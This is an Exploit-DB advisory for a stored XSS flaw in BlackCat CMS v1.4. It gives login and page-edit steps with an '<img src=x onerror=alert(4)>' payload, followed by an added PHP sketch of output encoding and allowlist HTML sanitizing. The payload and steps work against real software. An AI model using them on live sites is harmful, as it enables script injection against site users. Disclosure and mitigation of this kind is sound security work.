[webapps] Blackcat Cms v1.4 - Stored XSS
source link: https://www.exploit-db.com/exploits/51604
EDB-ID: 51604
Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
Steps:
1. Log in to the account
2. Go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. Set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
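
Mitigation sketch, added here as an example (not code from the advisory or from BlackCat CMS): the advisory does not name the affected field, so this shows output encoding for plain-text fields and an allowlist sanitizer for rich-text page content. The function names, the tag and scheme allowlists, and the sample inputs are assumptions; it needs PHP 8 with the DOM extension.

```php
<?php
declare(strict_types=1);
// Plain-text fields (titles, labels): encode on output.
function render_text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Rich-text fields: allowlist of tags => permitted attributes (hypothetical set).
const ALLOWED_TAGS = [
    'p' => [], 'br' => [], 'b' => [], 'i' => [], 'em' => [], 'strong' => [],
    'ul' => [], 'ol' => [], 'li' => [], 'a' => ['href'], 'img' => ['src', 'alt'],
];
const ALLOWED_SCHEMES = ['http', 'https', 'mailto'];

function sanitize_html(string $html): string
{
    $doc = new DOMDocument();
    // Wrap the fragment; only the wrapper's children are serialized, so markup
    // that escapes the wrapper with a stray </div> is dropped rather than kept.
    @$doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>', LIBXML_NONET);
    $root = $doc->getElementsByTagName('div')->item(0);
    if ($root === null) { return ''; }
    foreach ((new DOMXPath($doc))->query('.//*', $root) as $el) {
        if (!isset(ALLOWED_TAGS[$el->nodeName])) {
            $el->parentNode?->removeChild($el);   // script, iframe, svg, nested div, ...
            continue;
        }
        foreach (iterator_to_array($el->attributes) as $attr) {
            // Strip whitespace/control bytes that browsers ignore inside a URL scheme.
            $url = (string) preg_replace('/[\x00-\x20]+/', '', $attr->value);
            $isUrl = in_array($attr->name, ['href', 'src'], true);
            $hasScheme = preg_match('/^([a-z][a-z0-9+.\-]*):/i', $url, $m) === 1;
            if (!in_array($attr->name, ALLOWED_TAGS[$el->nodeName], true)
                || ($isUrl && $hasScheme && !in_array(strtolower($m[1]), ALLOWED_SCHEMES, true))) {
                $el->removeAttribute($attr->name);   // onerror, style, javascript: URLs
            }
        }
    }
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed inputs: the markup from step 3, in both contexts.
echo render_text('<img src=x onerror=alert(4)>'), PHP_EOL;
echo sanitize_html('<p>Welcome</p><img src=x onerror=alert(4)>'), PHP_EOL;
```

Sanitizing on save and again on render covers content stored before the filter existed; a Content-Security-Policy that disallows inline script adds a second layer for anything the allowlist misses.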